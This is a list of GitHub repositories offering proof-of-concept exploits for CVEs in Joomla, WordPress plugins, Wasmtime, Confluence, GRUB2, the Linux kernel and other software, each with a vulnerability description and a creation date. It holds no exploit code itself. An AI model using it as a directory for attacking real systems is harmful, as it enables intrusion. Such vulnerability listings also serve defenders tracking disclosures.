**PoC for exploiting CVE-2006-4468 : Multiple unspecified vulnerabilities in Joomla! before 1.0.11, related to unvalidated input, allow attackers to have an unknown impact via unspecified vectors involving the (1) mosMail, (2) JosIsValidEmail, and (3) josSpoofValue functions; (4) the lack of inclusion of globals.php in administrator/index.php; (5) the Admin User Manager; and (6) the poll module.** : [AlAIAL90/CVE-2006-4468](https://github.com/AlAIAL90/CVE-2006-4468) create time: 2021-10-01T21:25:41Z

**PoC for exploiting CVE-2006-4470 : Joomla! before 1.0.11 omits some checks for whether _VALID_MOS is defined, which allows attackers to have an unknown impact, possibly resulting in PHP remote file inclusion.** : [AlAIAL90/CVE-2006-4470](https://github.com/AlAIAL90/CVE-2006-4470) create time: 2021-10-01T21:25:30Z

**PoC for exploiting CVE-2006-4469 : Unspecified vulnerability in PEAR.php in Joomla! before 1.0.11 allows remote attackers to perform "remote execution," related to "Injection Flaws."** : [AlAIAL90/CVE-2006-4469](https://github.com/AlAIAL90/CVE-2006-4469) create time: 2021-10-01T21:25:26Z

**PoC for exploiting CVE-2006-4472 : Multiple unspecified vulnerabilities in Joomla! before 1.0.11 allow attackers to bypass user authentication via unknown vectors involving the (1) do_pdf command and the (2) emailform com_content task.** : [AlAIAL90/CVE-2006-4472](https://github.com/AlAIAL90/CVE-2006-4472) create time: 2021-10-01T21:25:22Z

**PoC for exploiting CVE-2007-4190 : CRLF injection vulnerability in Joomla! before 1.0.13 (aka Sunglow) allows remote attackers to inject arbitrary HTTP headers and probably conduct HTTP response splitting attacks via CRLF sequences in the url parameter. NOTE: this can be leveraged for cross-site scripting (XSS) attacks. NOTE: some of these details are obtained from third party information.** : [AlAIAL90/CVE-2007-4190](https://github.com/AlAIAL90/CVE-2007-4190) create time: 2021-10-01T21:25:56Z

**PoC for exploiting CVE-2007-4189 : Multiple cross-site scripting (XSS) vulnerabilities in Joomla! before 1.0.13 (aka Sunglow) allow remote attackers to inject arbitrary web script or HTML via unspecified vectors in the (1) com_search, (2) com_content, and (3) mod_login components. NOTE: some of these details are obtained from third party information.** : [AlAIAL90/CVE-2007-4189](https://github.com/AlAIAL90/CVE-2007-4189) create time: 2021-10-01T21:25:52Z

**PoC for exploiting CVE-2007-5577 : Multiple cross-site scripting (XSS) vulnerabilities in Joomla! before 1.0.13 (aka Sunglow) allow remote attackers to inject arbitrary web script or HTML via the (1) Title or (2) Section Name form fields in the Section Manager component, or (3) multiple unspecified fields in New Menu Item.** : [AlAIAL90/CVE-2007-5577](https://github.com/AlAIAL90/CVE-2007-5577) create time: 2021-10-01T21:25:49Z

**PoC for exploiting CVE-2007-4188 : Session fixation vulnerability in Joomla! before 1.0.13 (aka Sunglow) allows remote attackers to hijack administrative web sessions via unspecified vectors.** : [AlAIAL90/CVE-2007-4188](https://github.com/AlAIAL90/CVE-2007-4188) create time: 2021-10-01T21:25:37Z

**[CVE-2010-2078] Exploit for UnrealIrcd 3.2.8.1 version (custom modification from a perl script simplifying all posible for bash scripting)** : [0bfxgh0st/UnrealIrcd-3.2.8.1-cve-2010-2075-exploit](https://github.com/0bfxgh0st/UnrealIrcd-3.2.8.1-cve-2010-2075-exploit) create time: 2021-09-20T17:21:55Z

**PoC for exploiting CVE-2013-0340 : expat 2.1.0 and earlier does not properly handle entities expansion unless an application developer uses the XML_SetEntityDeclHandler function, which allows remote attackers to cause a denial of service (resource consumption), send HTTP requests to intranet servers, or read arbitrary files via a crafted XML document, aka an XML External Entity (XXE) issue. NOTE: it could be argued that because expat already provides the ability to disable external entity expansion, the responsibility for resolving this issue lies with application developers; according to this argument, this entry should be REJECTed, and each affected application would need its own CVE.** : [AlAIAL90/CVE-2013-0340](https://github.com/AlAIAL90/CVE-2013-0340) create time: 2021-09-21T10:00:32Z

**PoC for exploiting CVE-2016-6556 : OpenNMS version 18.0.1 and prior are vulnerable to a stored XSS issue due to insufficient filtering of SNMP agent supplied data. By creating a malicious SNMP 'sysName' or 'sysContact' response, an attacker can store an XSS payload which will trigger when a user of the web UI views the data. This issue was fixed in version 18.0.2, released on September 20, 2016.** : [AlAIAL90/CVE-2016-6556](https://github.com/AlAIAL90/CVE-2016-6556) create time: 2021-10-01T21:24:18Z

**PoC for exploiting CVE-2016-6555 : OpenNMS version 18.0.1 and prior are vulnerable to a stored XSS issue due to insufficient filtering of SNMP trap supplied data. By creating a malicious SNMP trap, an attacker can store an XSS payload which will trigger when a user of the web UI views the events list page. This issue was fixed in version 18.0.2, released on September 20, 2016.** : [AlAIAL90/CVE-2016-6555](https://github.com/AlAIAL90/CVE-2016-6555) create time: 2021-10-01T21:24:13Z

**According to researchers with Rapid7, over 110,000 devices appear on internet, which run stable Samba versions, while 92,500 seem to run unstable Samba versions, for which there is no fix. The newest Samba models, including the models 4.6.x before 4.6.4, 4.5.x before 4.5.10 and 3.5.0 before 4.4.13, was impacted by this error. May 24, 2017, Samba released version 4.6.4, which fixes a serious remote code execution vulnerability, vulnerability number CVE-2017-7494, which affected Samba 3.5.0 onwards. Vulnerability number: CVE-2017-7494 Severity Rating: High Affected software: • Samba Version < 4.6.4 • Samba Version < 4.5.10 • Samba Version < 4.4.14 Unaffected software: • Samba Version = 4.6.4 • Samba Version = 4.5.10 • Samba Version = 4.4.14** : [adjaliya/-CVE-2017-7494-Samba-Exploit-POC](https://github.com/adjaliya/-CVE-2017-7494-Samba-Exploit-POC) create time: 2021-09-29T20:31:20Z

**exploit** : [kd992102/CVE-2017-17275](https://github.com/kd992102/CVE-2017-17275) create time: 2021-09-25T14:16:54Z

**PoC for CVE-2017-7651** : [mukkul007/MqttAttack](https://github.com/mukkul007/MqttAttack) create time: 2021-09-24T21:39:29Z

**PoC for exploiting CVE-2018-10023 : Catfish CMS V4.7.21 allows XSS via the pinglun parameter to cat/index/index/pinglun (aka an authenticated comment).** : [AlAIAL90/CVE-2018-10023](https://github.com/AlAIAL90/CVE-2018-10023) create time: 2021-10-01T21:25:18Z

**CloudMe CVE-2018-6892 POC** : [crypticq/CLOUDME_B0F](https://github.com/crypticq/CLOUDME_B0F) create time: 2021-10-01T20:33:04Z

**FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter. This can lead to Pre-Auth Remote Code Execution.** : [k4is3r13/Bash-Script-CVE-2018-16763](https://github.com/k4is3r13/Bash-Script-CVE-2018-16763) create time: 2021-09-27T05:15:38Z

**Windows Kernel Registry Elevation of Privilege Vulnerability** : [trapmine/CVE-2018-8410](https://github.com/trapmine/CVE-2018-8410) create time: 2021-09-24T11:24:31Z

**Auto malicious git repository creation to exploit CVE-2018-11235 a Remote Code Execution using Git Sub module.** : [RyouYoo/CVE-2018-11235](https://github.com/RyouYoo/CVE-2018-11235) create time: 2021-09-22T21:15:50Z

**Remote command execution in Golang go get command allows an attacker to gain code execution on a system by installing a malicious library.** : [RyouYoo/CVE-2018-6574](https://github.com/RyouYoo/CVE-2018-6574) create time: 2021-09-22T12:13:52Z

**CVE-2018-16763 but without errors** : [NeKroFR/CVE-2018-16763](https://github.com/NeKroFR/CVE-2018-16763) create time: 2021-09-22T07:02:52Z

**PoC for exploiting CVE-2019-11358 : jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__ property, it could extend the native Object.prototype.** : [AlAIAL90/CVE-2019-11358](https://github.com/AlAIAL90/CVE-2019-11358) create time: 2021-10-01T21:25:07Z

**PoC for exploiting CVE-2019-11831 : The PharStreamWrapper (aka phar-stream-wrapper) package 2.x before 2.1.1 and 3.x before 3.1.1 for TYPO3 does not prevent directory traversal, which allows attackers to bypass a deserialization protection mechanism, as demonstrated by a phar:///path/bad.phar/../good.phar URL.** : [AlAIAL90/CVE-2019-11831](https://github.com/AlAIAL90/CVE-2019-11831) create time: 2021-10-01T21:25:03Z

**ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ../../ThinVnc.ini directory traversal attack vector.** : [k4is3r13/Bash-Script-CVE-2019-17662](https://github.com/k4is3r13/Bash-Script-CVE-2019-17662) create time: 2021-10-01T04:27:28Z

**no description** : [AsimShakeel10/cve-2019-exploit](https://github.com/AsimShakeel10/cve-2019-exploit) create time: 2021-09-29T07:35:12Z

**CVE-2019-19781** : [k-fire/CVE-2019-19781-exploit](https://github.com/k-fire/CVE-2019-19781-exploit) create time: 2021-09-27T02:23:02Z

**PoC for exploiting CVE-2019-17495 : A Cascading Style Sheets (CSS) injection vulnerability in Swagger UI before 3.23.11 allows attackers to use the Relative Path Overwrite (RPO) technique to perform CSS-based input field value exfiltration, such as exfiltration of a CSRF token value. In other words, this product intentionally allows the embedding of untrusted JSON data from remote servers, but it was not previously known that @import within the JSON data was a functional attack method.** : [AlAIAL90/CVE-2019-17495](https://github.com/AlAIAL90/CVE-2019-17495) create time: 2021-09-21T10:00:35Z

**漏洞POC、EXP合集,持续更新。ApacheSolr任意文件读取、蓝凌OA任意文件读取、phpStudyRCE、ShowDoc任意文件上传、原创先锋后台未授权、Kyan账号密码泄露、TerraMasterTos任意文件读取、TamronOS-IPTV系统RCE、Wayos防火墙账号密码泄露、ConfluenceRCE(CVE-2021-26084)、ZeroShell防火墙RCE(CVE-2019-12725)** : [Sma11New/PocList](https://github.com/Sma11New/PocList) create time: 2021-05-22T05:06:33Z

**Whatsapp remote code execution CVE-2019-11932 https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/** : [kal1gh0st/WhatsAppHACK-RCE](https://github.com/kal1gh0st/WhatsAppHACK-RCE) create time: 2021-03-19T16:41:31Z

**PoC for exploiting CVE-2020-19551 : Blacklist bypass issue exists in WUZHI CMS up to and including 4.1.0 in common.func.php, which when uploaded can cause remote code executiong.** : [AlAIAL90/CVE-2020-19551](https://github.com/AlAIAL90/CVE-2020-19551) create time: 2021-10-01T21:24:21Z

**PoC for exploiting CVE-2020-8561 : A security issue was discovered in Kubernetes where actors that control the responses of MutatingWebhookConfiguration or ValidatingWebhookConfiguration requests are able to redirect kube-apiserver requests to private networks of the apiserver. If that user can view kube-apiserver logs when the log level is set to 10, they can view the redirected responses and headers in the logs.** : [AlAIAL90/CVE-2020-8561](https://github.com/AlAIAL90/CVE-2020-8561) create time: 2021-10-01T21:22:52Z

**no description** : [puckiestyle/cve-2020-11651](https://github.com/puckiestyle/cve-2020-11651) create time: 2021-10-01T14:33:29Z

**no description** : [artsking/linux-4.1.15_CVE-2020-15436_withPatch](https://github.com/artsking/linux-4.1.15_CVE-2020-15436_withPatch) create time: 2021-10-01T11:37:52Z

**no description** : [tuo4n8/CVE-2020-2950](https://github.com/tuo4n8/CVE-2020-2950) create time: 2021-05-21T07:57:50Z

**no description** : [wdjcy/CVE-2021-26084](https://github.com/wdjcy/CVE-2021-26084) create time: 2021-10-02T03:11:50Z

**PoC for exploiting CVE-2021-21569 : Dell NetWorker, versions 18.x and 19.x contain a Path traversal vulnerability. A NetWorker server user with remote access to NetWorker clients may potentially exploit this vulnerability and gain access to unauthorized information.** : [AlAIAL90/CVE-2021-21569](https://github.com/AlAIAL90/CVE-2021-21569) create time: 2021-10-01T21:26:04Z

**PoC for exploiting CVE-2021-39216 : Wasmtime is an open source runtime for WebAssembly & WASI. In Wasmtime from version 0.19.0 and before version 0.30.0 there was a use-after-free bug when passing `externref`s from the host to guest Wasm content. To trigger the bug, you have to explicitly pass multiple `externref`s from the host to a Wasm instance at the same time, either by passing multiple `externref`s as arguments from host code to a Wasm function, or returning multiple `externref`s to Wasm from a multi-value return function defined in the host. If you do not have host code that matches one of these shapes, then you are not impacted. If Wasmtime's `VMExternRefActivationsTable` became filled to capacity after passing the first `externref` in, then passing in the second `externref` could trigger a garbage collection. However the first `externref` is not rooted until we pass control to Wasm, and therefore could be reclaimed by the collector if nothing else was holding a reference to it or otherwise keeping it alive. Then, when control was passed to Wasm after the garbage collection, Wasm could use the first `externref`, which at this point has already been freed. We have reason to believe that the effective impact of this bug is relatively small because usage of `externref` is currently quite rare. The bug has been fixed, and users should upgrade to Wasmtime 0.30.0. If you cannot upgrade Wasmtime yet, you can avoid the bug by disabling reference types support in Wasmtime by passing `false` to `wasmtime::Config::wasm_reference_types`.** : [AlAIAL90/CVE-2021-39216](https://github.com/AlAIAL90/CVE-2021-39216) create time: 2021-10-01T21:26:00Z

**PoC for exploiting CVE-2021-21570 : Dell NetWorker, versions 18.x and 19.x contain an Information disclosure vulnerability. A NetWorker server user with remote access to NetWorker clients may potentially exploit this vulnerability and gain access to unauthorized information.** : [AlAIAL90/CVE-2021-21570](https://github.com/AlAIAL90/CVE-2021-21570) create time: 2021-10-01T21:25:45Z

**PoC for exploiting CVE-2021-39219 : Wasmtime is an open source runtime for WebAssembly & WASI. Wasmtime before version 0.30.0 is affected by a type confusion vulnerability. As a Rust library the `wasmtime` crate clearly marks which functions are safe and which are `unsafe`, guaranteeing that if consumers never use `unsafe` then it should not be possible to have memory unsafety issues in their embeddings of Wasmtime. An issue was discovered in the safe API of `Linker::func_*` APIs. These APIs were previously not sound when one `Engine` was used to create the `Linker` and then a different `Engine` was used to create a `Store` and then the `Linker` was used to instantiate a module into that `Store`. Cross-`Engine` usage of functions is not supported in Wasmtime and this can result in type confusion of function pointers, resulting in being able to safely call a function with the wrong type. Triggering this bug requires using at least two `Engine` values in an embedding and then additionally using two different values with a `Linker` (one at the creation time of the `Linker` and another when instantiating a module with the `Linker`). It's expected that usage of more-than-one `Engine` in an embedding is relatively rare since an `Engine` is intended to be a globally shared resource, so the expectation is that the impact of this issue is relatively small. The fix implemented is to change this behavior to `panic!()` in Rust instead of silently allowing it. Using different `Engine` instances with a `Linker` is a programmer bug that `wasmtime` catches at runtime. This bug has been patched and users should upgrade to Wasmtime version 0.30.0. If you cannot upgrade Wasmtime and are using more than one `Engine` in your embedding it's recommended to instead use only one `Engine` for the entire program if possible. An `Engine` is designed to be a globally shared resource that is suitable to have only one for the lifetime of an entire process. If using multiple `Engine`s is required then code should be audited to ensure that `Linker` is only used with one `Engine`.** : [AlAIAL90/CVE-2021-39219](https://github.com/AlAIAL90/CVE-2021-39219) create time: 2021-10-01T21:25:34Z

**PoC for exploiting CVE-2021-24604 : The Availability Calendar WordPress plugin before 1.2.2 does not sanitise or escape its Category Names before outputting them in page/post where the associated shortcode is embed, allowing high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html is disallowed** : [AlAIAL90/CVE-2021-24604](https://github.com/AlAIAL90/CVE-2021-24604) create time: 2021-10-01T21:25:14Z

**PoC for exploiting CVE-2021-36286 : Dell SupportAssist Client Consumer versions 3.9.13.0 and any versions prior to 3.9.13.0 contain an arbitrary file deletion vulnerability that can be exploited by using the Windows feature of NTFS called Symbolic links. Symbolic links can be created by any(non-privileged) user under some object directories, but by themselves are not sufficient to successfully escalate privileges. However, combining them with a different object, such as the NTFS junction point allows for the exploitation. Support assist clean files functionality do not distinguish junction points from the physical folder and proceeds to clean the target of the junction that allows nonprivileged users to create junction points and delete arbitrary files on the system which can be accessed only by the admin.** : [AlAIAL90/CVE-2021-36286](https://github.com/AlAIAL90/CVE-2021-36286) create time: 2021-10-01T21:25:11Z

**PoC for exploiting CVE-2021-24613 : The Post Views Counter WordPress plugin before 1.3.5 does not sanitise or escape its Post Views Label settings, which could allow high privilege users to perform Cross-Site Scripting attacks in the frontend even when the unfiltered_html capability is disallowed** : [AlAIAL90/CVE-2021-24613](https://github.com/AlAIAL90/CVE-2021-24613) create time: 2021-10-01T21:24:59Z

**PoC for exploiting CVE-2021-40690 : All versions of Apache Santuario - XML Security for Java prior to 2.2.3 and 2.1.7 are vulnerable to an issue where the "secureValidation" property is not passed correctly when creating a KeyInfo from a KeyInfoReference element. This allows an attacker to abuse an XPath Transform to extract any local .xml files in a RetrievalMethod element.** : [AlAIAL90/CVE-2021-40690](https://github.com/AlAIAL90/CVE-2021-40690) create time: 2021-10-01T21:24:55Z

**PoC for exploiting CVE-2021-24583 : The Timetable and Event Schedule WordPress plugin before 2.4.2 does not have proper access control when deleting a timeslot, allowing any user with the edit_posts capability (contributor+) to delete arbitrary timeslot from any events. Furthermore, no CSRF check is in place as well, allowing such attack to be performed via CSRF against a logged in with such capability** : [AlAIAL90/CVE-2021-24583](https://github.com/AlAIAL90/CVE-2021-24583) create time: 2021-10-01T21:24:52Z

**PoC for exploiting CVE-2021-24600 : The WP Dialog WordPress plugin through 1.2.5.5 does not sanitise and escape some of its settings before outputting them in pages, allowing high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.** : [AlAIAL90/CVE-2021-24600](https://github.com/AlAIAL90/CVE-2021-24600) create time: 2021-10-01T21:24:48Z

**PoC for exploiting CVE-2021-24606 : The Availability Calendar WordPress plugin before 1.2.1 does not escape the category attribute from its shortcode before using it in a SQL statement, leading to a SQL Injection issue, which can be exploited by any user able to add shortcode to posts/pages, such as contributor+** : [AlAIAL90/CVE-2021-24606](https://github.com/AlAIAL90/CVE-2021-24606) create time: 2021-10-01T21:24:44Z

**PoC for exploiting CVE-2021-24584 : The Timetable and Event Schedule WordPress plugin before 2.4.2 does not have proper access control when updating a timeslot, allowing any user with the edit_posts capability (contributor+) to update arbitrary timeslot from any events. Furthermore, no CSRF check is in place as well, allowing such attack to be perform via CSRF against a logged in with such capability. In versions before 2.3.19, the lack of sanitisation and escaping in some of the fields, like the descritption could also lead to Stored XSS issues** : [AlAIAL90/CVE-2021-24584](https://github.com/AlAIAL90/CVE-2021-24584) create time: 2021-10-01T21:24:40Z

**PoC for exploiting CVE-2021-24585 : The Timetable and Event Schedule WordPress plugin before 2.4.0 outputs the Hashed Password, Username and Email Address (along other less sensitive data) of the user related to the Even Head of the Timeslot in the response when requesting the event Timeslot data with a user with the edit_posts capability. Combined with the other Unauthorised Event Timeslot Modification issue (https://wpscan.com/reports/submissions/4699/) where an arbitrary user ID can be set, this could allow low privilege users with the edit_posts capability (such as author) to retrieve sensitive User data by iterating over the user_id** : [AlAIAL90/CVE-2021-24585](https://github.com/AlAIAL90/CVE-2021-24585) create time: 2021-10-01T21:24:36Z

**PoC for exploiting CVE-2021-24596 : The youForms for WordPress plugin through 1.0.5 does not sanitise escape the Button Text field of its Templates, allowing high privilege users (editors and admins) to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed** : [AlAIAL90/CVE-2021-24596](https://github.com/AlAIAL90/CVE-2021-24596) create time: 2021-10-01T21:24:33Z

**PoC for exploiting CVE-2021-24635 : The Visual Link Preview WordPress plugin before 2.2.3 does not enforce authorisation on several AJAX actions and has the CSRF nonce displayed for all authenticated users, allowing any authenticated user (such as subscriber) to call them and 1) Get and search through title and content of Draft post, 2) Get title of a password-protected post as well as 3) Upload an image from an URL** : [AlAIAL90/CVE-2021-24635](https://github.com/AlAIAL90/CVE-2021-24635) create time: 2021-10-01T21:24:29Z

**PoC for exploiting CVE-2021-24618 : The Donate With QRCode WordPress plugin before 1.4.5 does not sanitise or escape its QRCode Image setting, which result into a Stored Cross-Site Scripting (XSS). Furthermore, the plugin also does not have any CSRF and capability checks in place when saving such setting, allowing any authenticated user (as low as subscriber), or unauthenticated user via a CSRF vector to update them and perform such attack.** : [AlAIAL90/CVE-2021-24618](https://github.com/AlAIAL90/CVE-2021-24618) create time: 2021-10-01T21:24:25Z

**PoC for exploiting CVE-2021-39218 : Wasmtime is an open source runtime for WebAssembly & WASI. In Wasmtime from version 0.26.0 and before version 0.30.0 is affected by a memory unsoundness vulnerability. There was an invalid free and out-of-bounds read and write bug when running Wasm that uses `externref`s in Wasmtime. To trigger this bug, Wasmtime needs to be running Wasm that uses `externref`s, the host creates non-null `externrefs`, Wasmtime performs a garbage collection (GC), and there has to be a Wasm frame on the stack that is at a GC safepoint where there are no live references at this safepoint, and there is a safepoint with live references earlier in this frame's function. Under this scenario, Wasmtime would incorrectly use the GC stack map for the safepoint from earlier in the function instead of the empty safepoint. This would result in Wasmtime treating arbitrary stack slots as `externref`s that needed to be rooted for GC. At the *next* GC, it would be determined that nothing was referencing these bogus `externref`s (because nothing could ever reference them, because they are not really `externref`s) and then Wasmtime would deallocate them and run `<ExternRef as Drop>::drop` on them. This results in a free of memory that is not necessarily on the heap (and shouldn't be freed at this moment even if it was), as well as potential out-of-bounds reads and writes. Even though support for `externref`s (via the reference types proposal) is enabled by default, unless you are creating non-null `externref`s in your host code or explicitly triggering GCs, you cannot be affected by this bug. We have reason to believe that the effective impact of this bug is relatively small because usage of `externref` is currently quite rare. This bug has been patched and users should upgrade to Wasmtime version 0.30.0. If you cannot upgrade Wasmtime at this time, you can avoid this bug by disabling the reference types proposal by passing `false` to `wasmtime::Config::wasm_reference_types`.** : [AlAIAL90/CVE-2021-39218](https://github.com/AlAIAL90/CVE-2021-39218) create time: 2021-10-01T21:24:09Z

**PoC for exploiting CVE-2021-24609 : The WP Mapa Politico Espana WordPress plugin before 3.7.0 does not sanitise or escape some of its settings before outputting them in attributes, allowing high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html is disallowed** : [AlAIAL90/CVE-2021-24609](https://github.com/AlAIAL90/CVE-2021-24609) create time: 2021-10-01T21:24:05Z

**PoC for exploiting CVE-2021-41083 : Dada Mail is a web-based e-mail list management system. In affected versions a bad actor could give someone a carefully crafted web page via email, SMS, etc, that - when visited, allows them control of the list control panel as if the bad actor was logged in themselves. This includes changing any mailing list password, as well as the Dada Mail Root Password - which could effectively shut out actual list owners of the mailing list and allow the bad actor complete and unfettered control of your mailing list. This vulnerability also affects profile logins. For this vulnerability to work, the target of the bad actor would need to be logged into the list control panel themselves. This CSRF vulnerability in Dada Mail affects all versions of Dada Mail v11.15.1 and below. Although we know of no known CSRF exploits that have happened in the wild, this vulnerability has been confirmed by our testing, and by a third party. Users are advised to update to version 11.16.0.** : [AlAIAL90/CVE-2021-41083](https://github.com/AlAIAL90/CVE-2021-41083) create time: 2021-10-01T21:24:01Z

**PoC for exploiting CVE-2021-41073 : loop_rw_iter in fs/io_uring.c in the Linux kernel 5.10 through 5.14.6 allows local users to gain privileges by using IORING_OP_PROVIDE_BUFFERS to trigger a free of a kernel buffer, as demonstrated by using /proc/<pid>/maps for exploitation.** : [AlAIAL90/CVE-2021-41073](https://github.com/AlAIAL90/CVE-2021-41073) create time: 2021-10-01T21:23:57Z

**PoC for exploiting CVE-2021-24639 : The OMGF WordPress plugin before 4.5.4 does not enforce path validation, authorisation and CSRF checks in the omgf_ajax_empty_dir AJAX action, which allows any authenticated users to delete arbitrary files or folders on the server.** : [AlAIAL90/CVE-2021-24639](https://github.com/AlAIAL90/CVE-2021-24639) create time: 2021-10-01T21:23:53Z

**PoC for exploiting CVE-2021-24637 : The Google Fonts Typography WordPress plugin before 3.0.3 does not escape and sanitise some of its block settings, allowing users with as role as low as Contributor to perform Stored Cross-Site Scripting attacks via blockType (combined with content), align, color, variant and fontID argument of a Gutenberg block.** : [AlAIAL90/CVE-2021-24637](https://github.com/AlAIAL90/CVE-2021-24637) create time: 2021-10-01T21:23:50Z

**PoC for exploiting CVE-2021-41088 : Elvish is a programming language and interactive shell, combined into one package. In versions prior to 0.14.0 Elvish's web UI backend (started by `elvish -web`) hosts an endpoint that allows executing the code sent from the web UI. The backend does not check the origin of requests correctly. As a result, if the user has the web UI backend open and visits a compromised or malicious website, the website can send arbitrary code to the endpoint in localhost. All Elvish releases from 0.14.0 onward no longer include the the web UI, although it is still possible for the user to build a version from source that includes the web UI. The issue can be patched for previous versions by removing the web UI (found in web, pkg/web or pkg/prog/web, depending on the exact version).** : [AlAIAL90/CVE-2021-41088](https://github.com/AlAIAL90/CVE-2021-41088) create time: 2021-10-01T21:23:46Z

**PoC for exploiting CVE-2021-32959 : Heap-based buffer overflow in SuiteLink server while processing commands 0x05/0x06** : [AlAIAL90/CVE-2021-32959](https://github.com/AlAIAL90/CVE-2021-32959) create time: 2021-10-01T21:23:42Z

**PoC for exploiting CVE-2021-24640 : The WordPress Slider Block Gutenslider plugin before 5.2.0 does not escape the minWidth attribute of a Gutenburg block, which could allow users with a role as low as contributor to perform Cross-Site Scripting attacks** : [AlAIAL90/CVE-2021-24640](https://github.com/AlAIAL90/CVE-2021-24640) create time: 2021-10-01T21:23:38Z

**PoC for exploiting CVE-2021-24636 : The Print My Blog WordPress Plugin before 3.4.2 does not enforce nonce (CSRF) checks, which allows attackers to make logged in administrators deactivate the Print My Blog plugin and delete all saved data for that plugin by tricking them to open a malicious link** : [AlAIAL90/CVE-2021-24636](https://github.com/AlAIAL90/CVE-2021-24636) create time: 2021-10-01T21:23:35Z

**PoC for exploiting CVE-2021-24657 : The Limit Login Attempts WordPress plugin before 4.0.50 does not escape the IP addresses (which can be controlled by attacker via headers such as X-Forwarded-For) of attempted logins before outputting them in the reports table, leading to an Unauthenticated Stored Cross-Site Scripting issue.** : [AlAIAL90/CVE-2021-24657](https://github.com/AlAIAL90/CVE-2021-24657) create time: 2021-10-01T21:23:31Z

**PoC for exploiting CVE-2021-24663 : The Simple Schools Staff Directory WordPress plugin through 1.1 does not validate uploaded logo pictures to ensure that are indeed images, allowing high privilege users such as admin to upload arbitrary file like PHP, leading to RCE** : [AlAIAL90/CVE-2021-24663](https://github.com/AlAIAL90/CVE-2021-24663) create time: 2021-10-01T21:23:27Z

**CVE-2021-22005 - VMWare vCenter Server File Upload to RCE** : [r0ckysec/CVE-2021-22005](https://github.com/r0ckysec/CVE-2021-22005) create time: 2021-09-25T16:21:56Z

**A Vagrant VM test lab to learn about CVE-2021-38647 in the Open Management Infrastructure agent (aka "omigod").** : [craig-m-unsw/omigod-lab](https://github.com/craig-m-unsw/omigod-lab) create time: 2021-09-18T15:25:18Z

**PoC CVE-2021-30632 - Out of bounds write in V8** : [Phuong39/PoC-CVE-2021-30632](https://github.com/Phuong39/PoC-CVE-2021-30632) create time: 2021-09-20T09:49:51Z

**Modified code so that we don´t need to rely on CAB archives** : [Edubr2020/CVE-2021-40444--CABless](https://github.com/Edubr2020/CVE-2021-40444--CABless) create time: 2021-09-19T19:46:28Z

**OMIGod / CVE-2021-38647 POC and Demo environment** : [SimenBai/CVE-2021-38647-POC-and-Demo-environment](https://github.com/SimenBai/CVE-2021-38647-POC-and-Demo-environment) create time: 2021-09-19T15:43:32Z

**Converted Metasploit exploits for Adobe Flash vulnerabilities CVE-2015-3090, CVE-2015-3105, CVE-2015-5119, and CVE-2015-5122 to python3 script.** : [Xattam1/Adobe-Flash-Exploits_CVE-2015-3090_CVE-2015-3105_CVE-2015-5119_CVE-2015-5122](https://github.com/Xattam1/Adobe-Flash-Exploits_CVE-2015-3090_CVE-2015-3105_CVE-2015-5119_CVE-2015-5122) create time: 2021-09-19T17:49:56Z

**Modifed ver of the original exploit to save some times on password reseting for unprivileged user** : [jayngng/CVE-2021-22911](https://github.com/jayngng/CVE-2021-22911) create time: 2021-09-19T11:43:06Z

**Scan for evidence of CVE-2021-30860 (FORCEDENTRY) exploit** : [Levilutz/CVE-2021-30860](https://github.com/Levilutz/CVE-2021-30860) create time: 2021-09-18T22:14:17Z

**[CVE-2021-26084] Confluence pre-auth RCE test script** : [ludy-dev/CVE-2021-26084_PoC](https://github.com/ludy-dev/CVE-2021-26084_PoC) create time: 2021-09-18T07:33:24Z

**PoC for exploiting CVE-2021-20118 : Nessus Agent 8.3.0 and earlier was found to contain a local privilege escalation vulnerability which could allow an authenticated, local administrator to run specific executables on the Nessus Agent host. This is different than CVE-2021-20117.** : [AlAIAL90/CVE-2021-20118](https://github.com/AlAIAL90/CVE-2021-20118) create time: 2021-09-18T02:44:48Z

**PoC for exploiting CVE-2020-14386 : A flaw was found in the Linux kernel before 5.9-rc4. Memory corruption can be exploited to gain root privileges from unprivileged processes. The highest threat from this vulnerability is to data confidentiality and integrity.** : [AlAIAL90/CVE-2020-14386](https://github.com/AlAIAL90/CVE-2020-14386) create time: 2021-09-18T02:46:53Z

**PoC for exploiting CVE-2020-14311 : There is an issue with grub2 before version 2.06 while handling symlink on ext filesystems. A filesystem containing a symbolic link with an inode size of UINT32_MAX causes an arithmetic overflow leading to a zero-sized memory allocation with subsequent heap-based buffer overflow.** : [AlAIAL90/CVE-2020-14311](https://github.com/AlAIAL90/CVE-2020-14311) create time: 2021-09-18T02:46:50Z

**PoC for exploiting CVE-2020-15705 : GRUB2 fails to validate kernel signature when booted directly without shim, allowing secure boot to be bypassed. This only affects systems where the kernel signing certificate has been imported directly into the secure boot database and the GRUB image is booted directly without the use of shim. This issue affects GRUB2 version 2.04 and prior versions.** : [AlAIAL90/CVE-2020-15705](https://github.com/AlAIAL90/CVE-2020-15705) create time: 2021-09-18T02:46:46Z

**PoC for exploiting CVE-2020-14308 : In grub2 versions before 2.06 the grub memory allocator doesn't check for possible arithmetic overflows on the requested allocation size. This leads the function to return invalid memory allocations which can be further used to cause possible integrity, confidentiality and availability impacts during the boot process.** : [AlAIAL90/CVE-2020-14308](https://github.com/AlAIAL90/CVE-2020-14308) create time: 2021-09-18T02:46:42Z

**PoC for exploiting CVE-2020-3238 : A vulnerability in the Cisco Application Framework component of the Cisco IOx application environment could allow an authenticated, remote attacker to write or modify arbitrary files in the virtual instance that is running on the affected device. The vulnerability is due to insufficient input validation of user-supplied application packages. An attacker who can upload a malicious package within Cisco IOx could exploit the vulnerability to modify arbitrary files. The impacts of a successful exploit are limited to the scope of the virtual instance and do not affect the device that is hosting Cisco IOx.** : [AlAIAL90/CVE-2020-3238](https://github.com/AlAIAL90/CVE-2020-3238) create time: 2021-09-18T02:46:18Z

